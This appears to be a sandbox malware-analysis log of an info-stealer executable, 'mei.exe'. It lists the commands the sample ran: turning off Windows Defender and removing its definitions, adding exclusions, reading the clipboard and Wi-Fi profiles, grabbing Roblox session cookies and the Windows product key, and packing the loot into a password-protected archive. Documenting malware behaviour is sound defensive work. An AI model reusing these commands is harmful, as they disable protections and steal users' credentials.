              Source: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\mei.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: mei.exe, 00000001.00000003.2025736451.000002E91417A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: mei.exe, mei.exe, 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: mei.exeVirustotal: Detection: 48%
              Source: mei.exeString found in binary or memory: set-addPolicy
              Source: mei.exeString found in binary or memory: id-cmc-addExtensions
              Source: mei.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: mei.exeString found in binary or memory: --help
              Source: mei.exeString found in binary or memory: --help
              Source: mei.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
              Source: mei.exeString found in binary or memory: when smaller code objects and pyc files are desired as well as suppressing the extra visual location indicators when the interpreter displays tracebacks. These variables have equivalent command-line parameters (see --help for details): PYTHONDEBUG
              Source: C:\Users\user\Desktop\mei.exe File read: C:\Users\user\Desktop\mei.exe
              Source: unknown Process created: C:\Users\user\Desktop\mei.exe C:\Users\user\Desktop\mei.exe
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Users\user\Desktop\mei.exe C:\Users\user\Desktop\mei.exe
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Users\user\Desktop\mei.exe C:\Users\user\Desktop\mei.exe
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\mei.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
